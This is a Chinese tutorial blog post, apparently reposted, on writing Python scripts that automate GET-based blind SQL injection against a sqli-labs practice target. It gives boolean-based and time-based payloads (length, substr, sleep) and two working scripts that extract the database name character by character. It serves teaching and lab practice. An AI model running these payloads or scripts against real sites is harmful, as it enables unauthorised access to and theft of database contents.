本篇文章介绍使用python编写SQL自动注入脚本,主要是进行get盲注。不同于报错注入,在进行盲注的时候,通常不能通过页面返回内容获得信息,如表名,字段名等,而是需要通过构造SQL语句注入,查看页面返回信息或响应时间来判断。这里实现两种盲注方式,基于布尔的盲注和基于时间的盲注。
搭建环境
基于布尔的盲注
基于时间的盲注
?id=1‘ and length(database())=1 --+判断数据库名长度是否为1,返回异常。
?id=1‘ and length(database())=8 --+时,返回成功,说明数据库名长度是否为8。
?id=1‘ and substr(database(),1,1)=‘字母‘--+判断数据库名。
import requests
import string
url = "http://10.16.53.180/newsqli/Less-8/"
normalHtmlLen = len(requests.get(url=url+"?id=1").text)
print("The len of HTML:"+str(normalHtmlLen))
dbNameLen = 0
while True:
dbNameLen_url = url + "?id=1‘+and+length(database())="+str(dbNameLen)+"--+"
print(dbNameLen_url)
if len(requests.get(dbNameLen_url).text) == normalHtmlLen:
print("The len of dbName:"+str(dbNameLen))
break
if dbNameLen == 30:
print("Error!")
break
dbNameLen += 1
dbName = ""
for i in range(1, dbNameLen+1):
for a in string.ascii_lowercase:
dbName_url = url + "?id=1‘+and+substr(database(),"+str(i)+",1)=‘"+a+"‘--+"
print(dbName_url)
if len(requests.get(dbName_url).text) == normalHtmlLen:
dbName += a
print(dbName)
break
?id=1‘ and if(length(database())=8,sleep(5),1) --+,根据响应时间确定数据库名长度为8。
?id=1‘ and if(substr(database(),1,1)=‘s‘,sleep(5),1) --+,根据响应时间确定数据库名第一个字符为“s”,再依次对数据库名第1~8字符进行判断,最终得到数据库名称。
import requests
import string
url = "http://10.16.53.180/newsqli/Less-9/"
def timeOut(url):
try:
res = requests.get(url, timeout=3)
return(res.text)
except Exception as e:
return("timeout")
daNnamelen = 0
while True:
daNnamelen +=1
dbNameLen_url = url + "?id=1‘+and+if(length(database())="+str(daNnamelen)+",sleep(5),1)--+"
print(dbNameLen_url)
if "timeout" in timeOut(dbNameLen_url):
print(daNnamelen)
break
if daNnamelen == 30:
print("error!")
break
dbName = ""
for i in range(1, 9):
for a in string.ascii_lowercase:
dbName_url = url + "?id=1‘+and+if(substr(database(),"+str(i)+",1)=‘"+a+"‘,sleep(5),1)--+"
print(dbName_url)
if "timeout" in timeOut(dbName_url):
dbName += a
print(dbName)
break
原文:https://www.cnblogs.com/cmx666/p/15119740.html